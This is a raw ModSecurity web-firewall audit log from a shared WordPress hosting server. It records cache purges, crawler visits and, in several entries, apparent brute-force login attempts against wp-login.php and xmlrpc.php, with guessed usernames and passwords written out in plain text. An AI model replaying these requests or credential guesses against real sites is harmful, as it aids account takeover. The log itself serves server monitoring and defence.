"MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291137854949 1198509 (- - -) Stopwatch2: 1751291137854949 1198509; combined=4432, p1=181, p2=4051, p3=0, p4=0, p5=199, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05d4ca51-Z-- --e90c831c-A-- [30/Jun/2025:19:15:40.489755 +0530] aGKVA-7n3O1Jy2lfkG6PQgAAAAA 103.185.74.40 1047 192.168.74.40 443 --e90c831c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e90c831c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e90c831c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751291139265196 1224969 (- - -) Stopwatch2: 1751291139265196 1224969; combined=2861, p1=106, p2=2576, p3=0, p4=0, p5=178, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e90c831c-Z-- --9d4a8911-A-- [30/Jun/2025:19:15:45.561421 +0530] aGKVCTGb89TevrjDLkKYUwAAABs 57.141.0.8 54964 192.168.74.40 443 --9d4a8911-B-- GET /https/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --9d4a8911-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9d4a8911-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751293224283869 16645 (- - -) Stopwatch2: 1751293224283869 16645; combined=4064, p1=158, p2=3797, p3=0, p4=0, p5=108, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --95615e31-Z-- --e59ae04b-A-- [30/Jun/2025:19:50:26.097522 +0530] aGKdKo0dd2nPn69n6Ml2TAAAABc 103.185.74.40 61264 192.168.74.40 443 --e59ae04b-B-- POST /wp-cron.php?doing_wp_cron=1751293226.0105071067810058593750 HTTP/1.1 Host: digitaltheka.com User-Agent: WordPress/6.8.1; https://digitaltheka.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --e59ae04b-C-- --e59ae04b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e59ae04b-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=4954, p1=84, p2=4657, p3=208, p4=5, p5=0, sr=53, sw=0, l=0, gc=0||Py scan:7652||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751293226081634 16232 (- - -) Stopwatch2: 1751293226081634 16232; combined=5346, p1=84, p2=4657, p3=208, p4=5, p5=330, sr=53, sw=0, l=0, gc=62 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e59ae04b-Z-- --00b6e03c-A-- [30/Jun/2025:19:50:26.315823 +0530] aGKdKAzBTyahmYRol-Ju0QAAABA 31.193.2.236 52240 192.168.74.40 443 --00b6e03c-B-- POST /xmlrpc.php HTTP/1.1 Host: fastraccholidays.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Length: 218 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9 Accept-Encoding: gzip, zstd Accept-Language: ja-JP,ja;q=0.9 Content-Type: application/xml Referer: https://fastraccholidays.com --00b6e03c-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>fastracc</string></value></param><param><value><string>@fastracc123</string></value></param></params></methodCall> --00b6e03c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294728618930 13614 (- - -) Stopwatch2: 1751294728618930 13614; combined=2514, p1=112, p2=2215, p3=0, p4=0, p5=187, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ce863f5f-Z-- --c66d3a4b-A-- [30/Jun/2025:20:15:29.025253 +0530] aGKjB8B3aX0RvqUPEP-tEAAAACs 103.185.74.40 13491 192.168.74.40 443 --c66d3a4b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --c66d3a4b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c66d3a4b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294727755494 1270207 (- - -) Stopwatch2: 1751294727755494 1270207; combined=2161, p1=95, p2=1879, p3=0, p4=0, p5=187, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c66d3a4b-Z-- --65d5f07b-A-- [30/Jun/2025:20:15:29.480888 +0530] aGKjCe9BbPNhoDnNq93tAgAAADA 20.171.207.232 48620 192.168.74.40 443 --65d5f07b-B-- GET /https/aainag/images/testimonials/https/js/images/images/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --65d5f07b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --65d5f07b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294729465942 15310 (- - -) Stopwatch2: 1751294729465942 15310; combined=3119, p1=162, p2=2825, p3=0, p4=0, p5=131, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --65d5f07b-Z-- --b7d22128-A-- [30/Jun/2025:20:15:30.436059 +0530] aGKjCTKvYPDEW93DbxjAEwAAACc 103.185.74.40 16444 192.168.74.40 443 --b7d22128-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b7d22128-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b7d22128-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751294729236779 1199642 (- - -) Stopwatch2: 1751294729236779 1199642; combined=2223, p1=98, p2=1942, p3=0, p4=0, p5=182, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b7d22128-Z-- --48a2be05-A-- [30/Jun/2025:20:15:30.593486 +0530] aGKjCu9BbPNhoDnNq93tAwAAADA 20.171.207.232 48620 192.168.74.40 443 --48a2be05-B-- GET /https/aainag/images/testimonials/https/js/js/js/rajasthan-destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --48a2be05-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --48a2be05-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296696058021 878292 (- - -) Stopwatch2: 1751296696058021 878292; combined=10399, p1=167, p2=9499, p3=324, p4=7, p5=402, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --731ed64d-Z-- --01ef217e-A-- [30/Jun/2025:20:48:17.125629 +0530] aGKqty-9ghEHYNBhT-IqEwAAAAk 103.185.74.40 16704 192.168.74.40 443 --01ef217e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --01ef217e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --01ef217e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296695832563 1293693 (- - -) Stopwatch2: 1751296695832563 1293693; combined=3126, p1=115, p2=2880, p3=0, p4=0, p5=131, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --01ef217e-Z-- --e024243e-A-- [30/Jun/2025:20:48:17.139199 +0530] aGKquLtn7Hk30HQdG1_K3gAAACA 188.166.88.13 56124 192.168.74.40 80 --e024243e-B-- POST /wp-login.php HTTP/1.1 Host: novemsol.com Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=ff9831fa6600d5e731e02b11ce611bff; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 83 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296697972006 525146 (- - -) Stopwatch2: 1751296697972006 525146; combined=8835, p1=125, p2=7931, p3=349, p4=10, p5=419, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cf679969-Z-- --181f1329-A-- [30/Jun/2025:20:48:18.541600 +0530] aGKquZtJ9OcZl5ZO8WlQ9QAAACw 103.185.74.40 15558 192.168.74.40 443 --181f1329-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --181f1329-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --181f1329-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296697337575 1204749 (- - -) Stopwatch2: 1751296697337575 1204749; combined=3555, p1=145, p2=3223, p3=0, p4=0, p5=186, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --181f1329-Z-- --69316408-A-- [30/Jun/2025:20:48:18.722429 +0530] aGKquhdZT6QI_9laxc8HwgAAAEI 188.166.88.13 51547 192.168.74.40 443 --69316408-B-- POST //xmlrpc.php HTTP/1.1 Host: www.bossits.in Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/xml Content-Length: 487 -- Apache-Handler: application/x-httpd-ea-php74___lsphp Stopwatch: 1751296701834999 646429 (- - -) Stopwatch2: 1751296701834999 646429; combined=9402, p1=225, p2=8433, p3=332, p4=7, p5=405, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9ef68467-Z-- --085d3d1e-A-- [30/Jun/2025:20:48:22.494246 +0530] aGKqvcC8EFOcQtWujkVRlAAAAD8 103.185.74.40 55816 192.168.74.40 443 --085d3d1e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --085d3d1e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --085d3d1e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296701251770 1243114 (- - -) Stopwatch2: 1751296701251770 1243114; combined=2719, p1=97, p2=2440, p3=0, p4=0, p5=182, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --085d3d1e-Z-- --bd7ca414-A-- [30/Jun/2025:20:48:22.691330 +0530] aGKqvQQvEAMqZ5pjIQncPAAAAEc 188.166.88.13 62745 192.168.74.40 443 --bd7ca414-B-- POST //wp-login.php HTTP/1.1 Host: rmhil.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 80 Accept-Language: en-US,en;q=0.5 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296703297875 642824 (- - -) Stopwatch2: 1751296703297875 642824; combined=6170, p1=128, p2=5237, p3=348, p4=8, p5=449, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ffe7f366-Z-- --4d52ce2e-A-- [30/Jun/2025:20:48:23.945845 +0530] aGKqvrtJ5oARuhVeBNEOYwAAADE 103.185.74.40 31857 192.168.74.40 443 --4d52ce2e-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4d52ce2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4d52ce2e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751296702713889 1232434 (- - -) Stopwatch2: 1751296702713889 1232434; combined=2677, p1=113, p2=2431, p3=0, p4=0, p5=133, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4d52ce2e-Z-- --9dc8b25c-A-- [30/Jun/2025:20:48:23.955373 +0530] aGKqvyCrI8h7G93_YJtAIAAAABo 188.166.88.13 57050 192.168.74.40 80 --9dc8b25c-B-- GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1 Host: rajasthantour.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --9dc8b25c-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298412466219 5348763 (- - -) Stopwatch2: 1751298412466219 5348763; combined=6921, p1=174, p2=6237, p3=227, p4=5, p5=278, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4aaeca31-Z-- --12c1a97c-A-- [30/Jun/2025:21:16:57.817056 +0530] aGKxa1i_NV0xgInTbBWlXAAAAD0 103.185.74.40 13689 192.168.74.40 443 --12c1a97c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --12c1a97c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --12c1a97c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298411757360 6059856 (- - -) Stopwatch2: 1751298411757360 6059856; combined=7313, p1=77, p2=7112, p3=0, p4=0, p5=123, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --12c1a97c-Z-- --7b006b2d-A-- [30/Jun/2025:21:16:57.911108 +0530] aGKxb3DzVReb5h0dql9UWwAAAAY 188.166.88.13 54551 192.168.74.40 443 --7b006b2d-B-- POST //wp-login.php HTTP/1.1 Host: rukunaltazaj.com Keep-Alive: 300 Connection: keep-alive Cookie: pll_language=en; wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 85 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://rukunaltazaj.com//wp-login.php --7b006b2d-C-- log=rukun&pwd=0192837465&redirect_to=https://rukunaltazaj.com//wp-admin/&testcookie=1 --7b006b2d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298423122866 486782 (- - -) Stopwatch2: 1751298423122866 486782; combined=9565, p1=90, p2=8984, p3=219, p4=5, p5=266, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9436266d-Z-- --82589d38-A-- [30/Jun/2025:21:17:03.623087 +0530] aGKxcCMLXTT0mySc_pxrYgAAAGY 103.185.74.40 48799 192.168.74.40 443 --82589d38-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --82589d38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --82589d38-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298416816648 6806715 (- - -) Stopwatch2: 1751298416816648 6806715; combined=6936, p1=236, p2=6551, p3=0, p4=0, p5=149, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --82589d38-Z-- --35765d68-A-- [30/Jun/2025:21:17:03.638189 +0530] aGKxdh5YY9pixRH-YzCH6wAAAF0 188.166.88.13 59031 192.168.74.40 443 --35765d68-B-- POST //wp-login.php HTTP/1.1 Host: designretouch.com Keep-Alive: 300 Connection: keep-alive Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 102 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://designretouch.com//wp-login.php --35765d68-C-- log=designretouch&pwd=designretouch55555&redirect_to=https://designretouch.com//wp-admin/&testcookie=1 --35765d68-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751298454585572 836340 (- - -) Stopwatch2: 1751298454585572 836340; combined=6064, p1=130, p2=5425, p3=235, p4=4, p5=270, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d8ae7349-Z-- --01e7c557-A-- [30/Jun/2025:21:17:35.453154 +0530] aGKxlL5LekqEkvaZPL0MegAAAEU 103.185.74.40 47136 192.168.74.40 443 --01e7c557-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --01e7c557-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --01e7c557-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: 